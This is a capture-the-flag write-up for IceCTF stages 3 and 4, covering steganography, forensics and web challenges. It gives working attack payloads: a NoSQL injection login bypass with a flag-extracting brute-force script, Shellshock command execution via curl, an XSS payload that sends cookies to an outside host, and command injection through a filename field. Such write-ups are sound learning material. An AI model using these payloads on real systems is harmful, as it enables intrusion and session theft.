IceCTF{Write_up_Stage3_Stage4}
Stage 3
Vape Nation Stego-50ptOpen up the Stego solve and swipe filters the flag hidden in the Green plane 0 filter
Audio problems Forensics -50 pt
open up the sonic visualizer .Go ahead to layer->add Spectogramme.
R.I.P Transmission Forensics -65 pt
Looking for the header of the file ,it is an ELF binary file .
but when we execute the elf file ./rip nothing looking interesting. so ,I have decided to strings the content and investigate inside
strings rip >rip_strings | subl rip_strings
something weird ,Maybe ,an embedded file hidden inside . let's extract it.
foremost -T ripa zip file with protected password comes out .Let's crack it with fcrackzip
fcrackzip -u -l 1-6 -c 'a1' 00002585.zippassword is :bunny
Extract the zip file and bingoo the flag is there
ChainedIn web 75 ptThe first thing that grabs my attention was in the home page foot bar .
We all know that MongoDB is an NOSql backend so ,closely the vulnerability could be a NoSQL injection ,I have read some articles about this type of injection and how to exploit it,but this was a challenge in root-me that includes the same vuln .With Burpsuite we can see that authentication sent in JSON Format .
{"user":"admin","pass":"admin"}
and the response is :
{"message":"Invalid credential !"}Let's try to bypass the authentication :
{"user":"admin","pass":{"$ne":"1"}}
We are authenticated as an administrator !! so, obviously its NoSQL injection good :D !
for more information visit this website http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
Let's now try to guess the password ,
{"user":{"$ne":"1"},"pass":{"$regex":"I.*$"}}the server return {"message":"Welcome back Administrator!"} 200 ok ,let's try mix up some other character
{"user":{"$ne":"1"},"pass":{"$regex":"v.*$"}}the server return {"message":"Invalid Credentials"} 500 Internal Server Error .
we know that the pattern of the flag is IceCTF{ and the service return 200 ok for the true check and 500 for false one and this is can help us to guess the next character and get the flag.I have written a python script to retrieve the flag .
import requests ascii_letters = 'IabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{-_}' def url(password): r = requests.post('http://chainedin.vuln.icec.tf/login', json={"user": {"$ne": "1"},"pass":{"$regex":password}}) return r.status_code def comp(flag): for i in ascii_letters: ch=flag+i+'.*$' #print i if url(ch)==200: flag+=i break return i if __name__ == "__main__": flag="IceCTF{" for x in xrange(1,60): flag+=comp(flag) print flag
The flag is : IceCTF{I_tou0gHT_Y0u_coulDNt_inJeCt_noSqL_tHanKs_monGo}
Geocities web 100 ptThis task takes me a while to solve it ! the service seems clean nothing looking strange and the website looking very old .So,I have tried to scan the target to identifies anything ,I have used dir search,Nikto,vega but nothing came out ! so , reading more the challenge description looking for a hint and here we go, it's maybe shell Shock vulnerability because he said "It must be running some ancient technology and probably hasn't been updated in years" .I found this article very useful to start the exploit .
Let's check the vuln
curl -A "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;" http://geocities.vuln.icec.tf/
Bingo ! it returns the uid and the gid so the service is vulnerable to Shell Sock attack
now run the bash in the host and ls the files
() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'ls'
cat get_posts.pl
User-Agent:() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'cat get_posts.pl'
Obviously ,the flag is hidden in the database we need to fetch the tables name on the DB change the code ,save it on ur host and download it to the machine using wget .
#!/usr/bin/perl use strict; use DBI; my $dbh = DBI->connect( "dbi:mysql:dbname=geocities;host=icectf_mariadb", "geocities", "geocities", { RaiseError => 1 }, ) or die $DBI::errstr; my tables = $dbh->tables(); print tables; $dbh->disconnect();now change the code to select from 47a6fd2ca39d2b0d6eea1c30008dd889 table
#!/usr/bin/perl use strict; use DBI; my $dbh = DBI->connect( "dbi:mysql:dbname=geocities;host=icectf_mariadb", "geocities", "geocities", { RaiseError => 1 }, ) or die $DBI::errstr; my $sth = $dbh->prepare("SELECT * FROM 47a6fd2ca39d2b0d6eea1c30008dd889"); $sth->execute(); my $row; while ($row = $sth->fetchrow_arrayref()) { print "@$row[1];@$row[2];@$row[3]\n"; } $sth->finish(); $dbh->disconnect();
The flag is : IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}
Intercepted Conversations Pt. 1
Intercepted Conversations Pt. 2
Stage 4
ImgBlog web 130 pt
After register/login we have check it the comment field it's vulnerable to XSS attack.
we need to get the admin session to login as admin .
<img src=x onerror=this.src='http://requestb.in/xfkbrpxf?c='+document.cookie>
Now we get the admin session ,change the current session with cookie manager and refresh the page
session=eyJ1c2VyIjoxfQ.CpyE3w.eBmlIu3HEm7vpDtAlE63CbMIK5A
and here we go we are in !
I have tried a little bit to upload pictures and inject the file name with null byte ,double extension, and comment SQL injection ,but nothing works ,I noticed that the service filters our requests of "filename" field ,remove (dots),(splashes) then use the Linux bash ,I think it's shell_exec() function of PHP ! ,So,Let's inject export $PATH to see how it will react !
The global path of linux is shown ! so let's ls files
filename=" $HOME | ls "
We identified flag.txt file .
filename=" $HOME | cat fl* "
0 comments: